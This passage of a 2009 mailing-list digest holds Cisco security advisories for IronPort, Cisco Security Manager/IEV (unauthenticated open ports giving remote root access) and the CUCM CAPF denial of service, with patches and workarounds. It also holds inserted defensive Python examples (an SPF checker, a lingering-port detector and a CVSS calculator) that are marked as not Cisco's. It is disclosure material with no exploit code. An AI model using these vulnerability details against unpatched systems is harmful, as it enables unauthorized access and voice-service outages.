feature to ensure that secure notification e-mail messages are valid.
This feature is enabled by recipients when configuring their PXE user
profile. Cisco has released a best practices document that describes
several techniques to mitigate against the phishing-style attacks
that is available at the following link:
http://www.cisco.com/web/about/security/intelligence/bpiron.html
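What the SPF half of that mitigation actually verifies, as an added example that is not Cisco's or IronPort's code: the connecting IP must be one the sending domain's published policy authorises, so a forged notification from an unrelated host fails the check. The domains, records and addresses in the in-memory DNS table are constructed; a real check_host() resolves TXT records over DNS. DKIM (signature verification of the message body and headers) is not shown.

```python
"""Minimal SPF check_host() (RFC 7208 semantics) over a constructed DNS table.

Added example, not Cisco/IronPort code. Supports ip4, ip6, include and all
with the four qualifiers; other mechanisms and modifiers return permerror.
"""
import ipaddress

# Constructed TXT records standing in for DNS lookups.
SPF_RECORDS = {
    "example.com": "v=spf1 ip4:192.0.2.0/24 include:_spf.gateway.example -all",
    "_spf.gateway.example": "v=spf1 ip4:198.51.100.10 ip6:2001:db8::/32 ~all",
    "loop.example": "v=spf1 include:loop.example -all",   # pathological self-include
}

MAX_LOOKUPS = 10   # RFC 7208 section 4.6.4 limit on DNS-querying mechanisms
QUALIFIERS = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}


def check_host(ip, domain, records=SPF_RECORDS, _lookups=None):
    """Result of evaluating <domain>'s SPF policy for a message from <ip>:
    pass / fail / softfail / neutral / none / permerror."""
    if _lookups is None:
        _lookups = [0]   # shared counter across include recursion
    record = records.get(domain)
    if record is None or not record.startswith("v=spf1"):
        return "none"
    addr = ipaddress.ip_address(ip)
    for term in record.split()[1:]:
        qualifier = "+"
        if term[0] in QUALIFIERS:
            qualifier, term = term[0], term[1:]
        name, _, arg = term.partition(":")
        if name == "all":
            return QUALIFIERS[qualifier]
        if name in ("ip4", "ip6"):
            try:
                network = ipaddress.ip_network(arg, strict=False)
            except ValueError:
                return "permerror"
            # An IPv4 address is never inside an IPv6 network and vice versa.
            if addr in network:
                return QUALIFIERS[qualifier]
        elif name == "include":
            _lookups[0] += 1
            if _lookups[0] > MAX_LOOKUPS:
                return "permerror"
            sub = check_host(ip, arg, records, _lookups)
            if sub == "pass":
                return QUALIFIERS[qualifier]
            if sub in ("none", "permerror"):
                return "permerror"
            # fail / softfail / neutral from the include: mechanism does not match
        else:
            return "permerror"   # a, mx, ptr, exists, redirect= not implemented here
    return "neutral"   # no mechanism matched and the record has no "all"


if __name__ == "__main__":
    for sender_ip in ("192.0.2.25", "198.51.100.10", "2001:db8::1", "203.0.113.5"):
        print(sender_ip, check_host(sender_ip, "example.com"))
```

A gateway that enforces `-all` as a reject (rather than merely annotating the message) is what turns the record into a phishing mitigation; a softfail policy only informs downstream filters.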
Obtaining Fixed Software
========================
Cisco has released free software updates that address these
vulnerabilities. The affected products in this advisory are directly
supported by IronPort, and not via the Cisco TAC organization.
Customers should contact IronPort technical support at the link below
to obtain software fixes. IronPort technical support will assist
customers in determining the correct fixes and installation
procedures. Customers should direct all warranty questions to
IronPort technical support.
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.
http://www.ironport.com/support/contact_support.html
Exploitation and Public Announcements
=====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerabilities that are described in this advisory.
J.B. Snyder of Brintech reported a method for obtaining PXE
Encryption user credentials via a phishing-style attack to Cisco.
All other vulnerabilities were discovered by Cisco or reported by
customers.
Status of this Notice: FINAL
============================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Distribution
============
This advisory is posted on Cisco's worldwide website at:
http://www.cisco.com/warp/public/707/cisco-sa-20090114-ironport.shtml
In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-bulletins@lists.first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.
Revision History
================
+---------------------------------------+
| Revision | | Initial |
| 1.0 | 2009-January-14 | public |
| | | release |
+---------------------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at:
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html
This includes instructions for press inquiries regarding Cisco security notices.
All Cisco security advisories are available at:
http://www.cisco.com/go/psirt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (SunOS)
iD8DBQFJbhoo86n/Gc8U/uARAjuxAJ4oLc1JjS7N9728Ueb6JB7Y2LVJtACfaSfA
A6WIz481vajHya3jIlp+/Xc=
=cFJ6
-----END PGP SIGNATURE-----
--- End Message ---
--- Begin Message ---
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Cisco Security Advisory: Cisco Security Manager Vulnerability
Advisory ID: cisco-sa-20090121-csm
http://www.cisco.com/warp/public/707/cisco-sa-20090121-csm.shtml
Revision 1.0
For Public Release 2009 January 21 1600 UTC (GMT)
- ---------------------------------------------------------------------
Summary
=======
Cisco Security Manager contains a vulnerability when it is used with
Cisco IPS Event Viewer (IEV) that results in open TCP ports on both
the Cisco Security Manager server and IEV client. An unauthenticated,
remote attacker could leverage this vulnerability to access the MySQL
databases or IEV server.
Cisco has released free software updates that address this
vulnerability. A workaround is also available to mitigate this
vulnerability.
This advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20090121-csm.shtml
Affected Products
=================
Vulnerable Products
+------------------
All 3.1 and 3.2 versions prior to 3.2.2 of Cisco Security Manager are
affected by this vulnerability. Cisco IEV is installed with Cisco
Security Manager by default, but the vulnerability is not exposed
until IEV has been launched.
Products Confirmed Not Vulnerable
+--------------------------------
The following products have been confirmed not vulnerable:
* Cisco Security Manager 3.2.2
* Cisco Security Manager 3.0.x and earlier
* Standalone implementations of Cisco IEV
* Cisco IPS Manager Express
No other Cisco products are currently known to be affected by this
vulnerability.
Details
=======
Cisco Security Manager is an enterprise-class management application
that is designed to configure firewall, VPN, and intrusion prevention
security services on Cisco network and security devices. As part of
Cisco Security Manager installation, the Cisco IEV is installed by
default. The IEV is a Java-based application that allows users to
view and manage alerts for up to five sensors, including the ability
to report top alerts, attackers, and victims over a specified number
of hours or days. Users can connect to and view alerts in real time
or via imported log files, configure filters and views to help manage
alerts, and import and export event data for further analysis.
A vulnerability exists in the Cisco Security Manager server. When the
IEV is launched, it opens several remotely available TCP ports on the
Cisco Security Manager server and client. These ports could allow
remote, unauthenticated root access to the IEV database and server.
When IEV is closed, it closes open ports on the Cisco Security
Manager client that launched the IEV but fails to close open ports on
the server. If the IEV has never been used on the system, the Cisco
Security Manager server is not vulnerable.
The IEV database contains events that are collected from Cisco
Intrusion Prevention System (IPS) devices. The IEV server allows an
unauthenticated user to add, delete, or modify the devices that are
added into the IEV.
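A check a practitioner would want for exactly this failure mode (a process opens listeners on launch and leaves them behind on exit), as an added example that is not Cisco's code. The three snapshots are constructed `netstat -ano` output in the Windows format; the port numbers and PIDs are invented and do not identify the ports IEV really opens. On a real Cisco Security Manager server, take the same three snapshots (before launching IEV, while it runs, after closing it) and pass them in; anything reported is a socket an unauthenticated remote client can still reach.

```python
"""Spot listening TCP sockets that a program opened and did not close.

Added example, not Cisco's. Snapshots below are constructed `netstat -ano`
output; ports 50100/50101 and pid 3316 are invented.
"""
import re

# TCP rows only: UDP rows carry no state column and do not "listen" in this sense.
LISTENING_ROW = re.compile(r"^\s*TCP\s+(\S+):(\d+)\s+\S+\s+LISTENING\s+(\d+)\s*$")

BASELINE = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       820
  TCP    0.0.0.0:443            0.0.0.0:0              LISTENING       2204
  TCP    [::]:135               [::]:0                 LISTENING       820
  UDP    0.0.0.0:123            *:*                                    1048
"""
WHILE_RUNNING = BASELINE + """\
  TCP    0.0.0.0:50100          0.0.0.0:0              LISTENING       3316
  TCP    0.0.0.0:50101          0.0.0.0:0              LISTENING       3316
  TCP    127.0.0.1:50101        127.0.0.1:49700        ESTABLISHED     3316
"""
AFTER_EXIT = BASELINE + """\
  TCP    0.0.0.0:50100          0.0.0.0:0              LISTENING       3316
"""


def parse_listeners(netstat_output):
    """{(local_address, port): pid} for every TCP socket in LISTENING state."""
    listeners = {}
    for line in netstat_output.splitlines():
        m = LISTENING_ROW.match(line)
        if m:
            listeners[(m.group(1), int(m.group(2)))] = int(m.group(3))
    return listeners


def opened_by_launch(before, during):
    """Listeners present while the program runs that were not there before."""
    return {sock: pid for sock, pid in during.items() if sock not in before}


def lingering_listeners(before, during, after):
    """Launch-opened listeners that survive the program's exit."""
    opened = opened_by_launch(before, during)
    return sorted((sock, pid) for sock, pid in after.items() if sock in opened)


def report(before_txt, during_txt, after_txt):
    """Human-readable lines, one per lingering listener; empty list when clean."""
    before, during, after = map(parse_listeners, (before_txt, during_txt, after_txt))
    return [f"{addr}:{port} (pid {pid}) still listening after exit"
            for (addr, port), pid in lingering_listeners(before, during, after)]


if __name__ == "__main__":
    print("\n".join(report(BASELINE, WHILE_RUNNING, AFTER_EXIT)) or "nothing lingering")
```

Binding to 0.0.0.0 or [::] is what makes a lingering socket remotely reachable; a listener on 127.0.0.1 would show up in the same report but is only a local-privilege concern.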
This vulnerability is documented in Cisco Bug ID CSCsv66897 and has
been assigned Common Vulnerabilities and Exposures (CVE) identifier
CVE-2008-3820.
Vulnerability Scoring Details
=============================
Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at
http://intellishield.cisco.com/security/alertmanager/cvss
CSCsv66897: Cisco Security Manager/IEV: TCP Ports open for remote
connection without any authentication
CVSS Base Score - 8.8
Access Vector - Network
Access Complexity - Medium
Authentication - None
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - None
CVSS Temporal Score - 7.3
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
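An added worked example, not part of Cisco's advisory text: it implements the CVSS v2.0 base and temporal equations with the published CVSS v2 metric weights, reads the "Metric - Value" block printed above for CSCsv66897, and reproduces its 8.8 base and 7.3 temporal score. The same code also scores the vector-string form and the identical scoring blocks in the CAPF and WLC advisories later in this digest, so it is not repeated there.

```python
from decimal import Decimal, ROUND_HALF_UP

# CVSS v2.0 metric weights, as defined in the CVSS v2 specification.
AV = {"L": 0.395, "A": 0.646, "N": 1.0}                          # Access Vector
AC = {"H": 0.35, "M": 0.61, "L": 0.71}                           # Access Complexity
AU = {"M": 0.45, "S": 0.56, "N": 0.704}                          # Authentication
CIA = {"N": 0.0, "P": 0.275, "C": 0.660}                         # C/I/A impact
E = {"U": 0.85, "POC": 0.9, "F": 0.95, "H": 1.0, "ND": 1.0}      # Exploitability
RL = {"OF": 0.87, "TF": 0.90, "W": 0.95, "U": 1.0, "ND": 1.0}    # Remediation Level
RC = {"UC": 0.90, "UR": 0.95, "C": 1.0, "ND": 1.0}               # Report Confidence

# Cisco's "Metric - Value" wording mapped to the short metric codes above.
LABELS = {
    "Access Vector": ("AV", {"Local": "L", "Adjacent Network": "A", "Network": "N"}),
    "Access Complexity": ("AC", {"High": "H", "Medium": "M", "Low": "L"}),
    "Authentication": ("Au", {"Multiple": "M", "Single": "S", "None": "N"}),
    "Confidentiality Impact": ("C", {"None": "N", "Partial": "P", "Complete": "C"}),
    "Integrity Impact": ("I", {"None": "N", "Partial": "P", "Complete": "C"}),
    "Availability Impact": ("A", {"None": "N", "Partial": "P", "Complete": "C"}),
    "Exploitability": ("E", {"Unproven": "U", "Proof-of-Concept": "POC",
                             "Functional": "F", "High": "H", "Not Defined": "ND"}),
    "Remediation Level": ("RL", {"Official-Fix": "OF", "Temporary-Fix": "TF",
                                 "Workaround": "W", "Unavailable": "U", "Not Defined": "ND"}),
    "Report Confidence": ("RC", {"Unconfirmed": "UC", "Uncorroborated": "UR",
                                 "Confirmed": "C", "Not Defined": "ND"}),
}


def round1(x: float) -> float:
    """CVSS v2 round_to_1_decimal: half-up, unlike Python's round()."""
    return float(Decimal(repr(x)).quantize(Decimal("0.1"), rounding=ROUND_HALF_UP))


def parse_vector(vector: str) -> dict:
    """'AV:N/AC:M/Au:N/C:C/I:C/A:N' -> {'AV': 'N', 'AC': 'M', ...}"""
    return dict(part.split(":", 1) for part in vector.split("/"))


def parse_advisory_block(text: str) -> dict:
    """Read the 'Metric - Value' lines of a Cisco scoring block into metric codes."""
    metrics = {}
    for line in text.splitlines():
        if " - " not in line:
            continue
        label, value = (s.strip() for s in line.split(" - ", 1))
        if label in LABELS:          # skips "CVSS Base Score - 8.8" and similar lines
            key, mapping = LABELS[label]
            metrics[key] = mapping[value]
    return metrics


def base_score(m: dict) -> float:
    impact = 10.41 * (1 - (1 - CIA[m["C"]]) * (1 - CIA[m["I"]]) * (1 - CIA[m["A"]]))
    exploitability = 20 * AV[m["AV"]] * AC[m["AC"]] * AU[m["Au"]]
    if impact == 0:                  # f(Impact) = 0 when there is no impact at all
        return 0.0
    return round1((0.6 * impact + 0.4 * exploitability - 1.5) * 1.176)


def temporal_score(m: dict) -> float:
    """The temporal score is derived from the already-rounded base score."""
    return round1(base_score(m) * E[m["E"]] * RL[m["RL"]] * RC[m["RC"]])


def score_block(text: str):
    """Base and temporal score for one Cisco-style scoring block."""
    m = parse_advisory_block(text)
    return base_score(m), temporal_score(m)


# Scoring block for CSCsv66897, copied from the advisory above.
CSCSV66897 = """\
Access Vector - Network
Access Complexity - Medium
Authentication - None
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - None
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
"""

if __name__ == "__main__":
    print("CSCsv66897 base/temporal:", score_block(CSCSV66897))    # (8.8, 7.3)
```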
Impact
======
Successful exploitation of this vulnerability may result in remote
root access to the IEV database or to the IEV Server. Upon launching
the IEV remotely accessible ports are opened on the Cisco Security
Manager server and the client where the IEV is launched. When the IEV
application is closed these ports are subsequently closed on the
client however remain open on the Cisco Security Manager server.
Software Versions and Fixes
===========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to
determine exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.
A software patch for Cisco Security Manager versions 3.1, 3.1.1, 3.2
and 3.2.1 is available for download at:
http://www.cisco.com/cgi-bin/tablebuild.pl/csm-app?psrtdcat20e2
The patch file names by Cisco Security Manager version follow:
+------------------------------------------+
| Cisco | |
| Security | Patch Filename |
| Manager | |
| version | |
|-----------+------------------------------|
| 3.0.x and | Not Vulnerable |
| earlier | |
|-----------+------------------------------|
| 3.1 | CSM310PatchCSCsv66897.zip |
|-----------+------------------------------|
| 3.1.1.SP3 | CSM311SP3PatchCSCsv66897.zip |
|-----------+------------------------------|
| 3.2.SP2 | CSM320SP2PatchCSCsv66897.zip |
|-----------+------------------------------|
| 3.2.1.SP1 | CSM321SP1PatchCSCsv66897.zip |
|-----------+------------------------------|
| 3.2.2 | Not Vulnerable |
+------------------------------------------+
Please read the corresponding readme files for installation
instructions.
Workarounds
===========
In the event that Cisco IEV is not being used, administrators are
advised to disable the functionality until a patch is applied. To
disable IEV on Cisco Security Manager, perform the following steps:
1. Access the Microsoft Windows Server that Cisco Security Manager
is installed on.
2. Open the Services dialog box (Choose Start > Administrative Tools
> Services).
3. Locate the Cisco IPS Event Viewer service and open Properties.
4. Change Startup Type: to Disabled and click Ok.
5. Stop the Cisco IPS Event Viewer service.
6. Stop and Restart the Cisco Security Manager Daemon Manager
service.
7. Confirm that the Cisco IPS Event Viewer service has not
restarted.
Upon disabling the Cisco IPS Event Viewer service, the open ports
on the Cisco Security Manager server will be closed.
Additional mitigations that can be deployed on Cisco devices
within the network are available in the Cisco Applied Mitigation
Bulletin companion document for this advisory:
http://www.cisco.com/warp/public/707/cisco-amb-20090121-csm.shtml
Obtaining Fixed Software
========================
Cisco has released free software updates that address these
vulnerabilities. Prior to deploying software, customers should
consult their maintenance provider or check the software for feature
set compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at
http://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.
Customers with Service Contracts
+-------------------------------
Customers with contracts should obtain upgraded software through
their regular update channels. For most customers, this means that
upgrades should be obtained through the Software Center on Cisco's
worldwide website at http://www.cisco.com
Customers using Third Party Support Organizations
+------------------------------------------------
Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.
The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.
Customers without Service Contracts
+----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.
Refer to http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html
for additional TAC contact information, including localized
telephone numbers, and instructions and e-mail addresses for use in
various languages.
Exploitation and Public Announcements
=====================================
Cisco PSIRT is not aware of any public announcements or malicious use
of the vulnerability that is described in this advisory.
This vulnerability was discovered through internal Cisco testing.
Status of this Notice: FINAL
============================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Distribution
============
This advisory is posted on Cisco's worldwide website at:
http://www.cisco.com/warp/public/707/cisco-sa-20090121-csm.shtml
In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-bulletins@lists.first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.
Revision History
================
+---------------------------------------+
| Revision |                 | Initial  |
| 1.0      | 2009-January-21 | public   |
|          |                 | release  |
+---------------------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html
This includes instructions for press inquiries regarding Cisco
security notices. All Cisco security advisories are available at
http://www.cisco.com/go/psirt
--- End Message ---
--- Begin Message ---
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Cisco Security Advisory: Cisco Unified Communications Manager CAPF
Denial of Service Vulnerability
Advisory ID: cisco-sa-20090121-cucmcapf
Revision 1.0
For Public Release 2009 January 21 1600 UTC (GMT)
+---------------------------------------------------------------------
Summary
=======
Cisco Unified Communications Manager, formerly Cisco CallManager,
contains a denial of service (DoS) vulnerability in the Certificate
Authority Proxy Function (CAPF) service. Exploitation of this
vulnerability could cause an interruption in voice services. The CAPF
service is disabled by default.
Cisco has released free software updates that address this
vulnerability. Workarounds that mitigate this vulnerability are
available.
This advisory is posted at:
http://www.cisco.com/warp/public/707/cisco-sa-20090121-cucmcapf.shtml
Affected Products
=================
Vulnerable Products
+------------------
These products are vulnerable:
* Cisco Unified Communications Manager 5.x versions prior to 5.1(3e)
* Cisco Unified Communications Manager 6.x versions prior to 6.1(3)
Administrators of systems that are running Cisco Unified
Communications Manager versions 5.x and 6.x can determine the
software version by viewing the main page of the Cisco Unified
Communications Manager Administration interface. The software version
can also be determined by running the command show version active by
way of the command line interface (CLI).
Products Confirmed Not Vulnerable
+--------------------------------
Cisco Unified Communications Manager version 4.x and Cisco Unified
Communications Manager Express are not affected by this
vulnerability. No other Cisco products are currently known to be
affected by this vulnerability.
Note: Cisco Unified Communications Manager 7.0(1) shipped with the
software fix for this vulnerability and is not affected.
Details
=======
The CAPF service of Cisco Unified Communications Manager versions 5.x
and 6.x contains a vulnerability when handling malformed input that
may result in a DoS condition. The CAPF service is disabled by
default; however, if it is enabled, the CAPF service listens by
default on TCP port 3804 and the listening port is configurable by
the user. There is a workaround for this vulnerability. This
vulnerability is fixed in Cisco Unified Communications Manager
versions 5.1(3e) and 6.1(3). This vulnerability is documented in
Cisco Bug ID CSCsq32032 and has been assigned Common Vulnerabilities
and Exposures (CVE) identifier CVE-2009-0057.
Vulnerability Scoring Details
=============================
Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at:
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at:
http://intellishield.cisco.com/security/alertmanager/cvss
CSCsq32032 - CAPF DoS when client terminates prematurely
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
Impact
======
Successful exploitation of the vulnerability described in this
advisory may result in the interruption of voice services.
Software Versions and Fixes
===========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to
determine exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.
Cisco Unified Communications Manager version 5.1(3e) contains the fix
for this vulnerability and can be downloaded here:
http://tools.cisco.com/support/downloads/go/ReleaseType.x?optPlat=null&isPlatform=Y&mdfid=280735907&sftType=Unified%20Communications%20Manager%20Updates&treeName=Voice%20and%20Unified%20Communications&modelName=Cisco%20Unified%20Communications%20Manager%20Version%205.1&mdfLevel=Software%20Version/Option&treeMdfId=278875240&modifmdfid=null&imname=null&hybrid=Y&imst=N
Cisco Unified Communications Manager version 6.1(3) contains the fix
for this vulnerability and can be downloaded here:
http://tools.cisco.com/support/downloads/go/PlatformList.x?sftType=Unified%20Communications%20Manager%20Updates&mdfid=281023410&treeName=Voice%20and%20Unified%20Communications&mdfLevel=Software%20Version/Option&url=null&modelName=Cisco%20Unified%20Communications%20Manager%20Version%206.1&isPlatform=N&treeMdfId=278875240&modifmdfid=null&imname=null&hybrid=Y&imst=N
Workarounds
===========
To mitigate against this vulnerability, system administrators can
disable the CAPF service if it is not necessary for business
operations. Access to the CAPF service is only required if Cisco
Unified Communications Manager systems and IP phone devices are
configured to use certificates for a secure deployment. If phones are
not configured to use certificates, then the CAPF service can be
disabled. The CAPF service is controlled by the Cisco Certificate
Authority Proxy Function menu selection.
It is possible to mitigate the CAPF vulnerability by implementing
filtering on screening devices if the CAPF service is required. If
the CAPF service is enabled, allow access to TCP port 3804 only from
networks that contain IP phone devices that require the CAPF service.
The CAPF port is user configurable, and if modified, filtering on
screening devices should be based on the TCP port that is used.
For Cisco Unified Communications Manager 5.x and 6.x systems, please
consult the following documentation for details on how to disable
Cisco Unified Communications Manager services:
http://www.cisco.com/en/US/docs/voice_ip_comm/cucm/service/5_0_1/ccmsrva/sasrvact.html#wp1048220
Additional mitigation techniques that can be deployed on Cisco
devices within the network are available in the Cisco Applied
Mitigation Bulletin companion document for this advisory:
http://www.cisco.com/warp/public/707/cisco-amb-20090121-cucmcapf.shtml
Obtaining Fixed Software
========================
Cisco has released free software updates that address these
vulnerabilities. Prior to deploying software, customers should
consult their maintenance provider or check the software for feature
set compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at:
http://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html
or as otherwise set forth at Cisco.com Downloads at:
http://www.cisco.com/public/sw-center/sw-usingswc.shtml
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.
Customers with Service Contracts
+-------------------------------
Customers with contracts should obtain upgraded software through
their regular update channels. For most customers, this means that
upgrades should be obtained through the Software Center on Cisco's
worldwide website at http://www.cisco.com.
Customers using Third Party Support Organizations
+------------------------------------------------
Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.
The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.
Customers without Service Contracts
+----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.
Refer to http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html
for additional TAC contact
information, including localized telephone numbers, and instructions
and e-mail addresses for use in various languages.
Exploitation and Public Announcements
=====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerability described in this advisory.
This vulnerability was reported to Cisco by VoIPshield.
Status of this Notice: FINAL
============================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Distribution
============
This advisory is posted on Cisco's worldwide website at:
http://www.cisco.com/warp/public/707/cisco-sa-20090121-cucmcapf.shtml
In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-bulletins@lists.first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.
Revision History
================
+---------------------------------------+
| Revision |                 | Initial  |
| 1.0      | 2009-January-21 | public   |
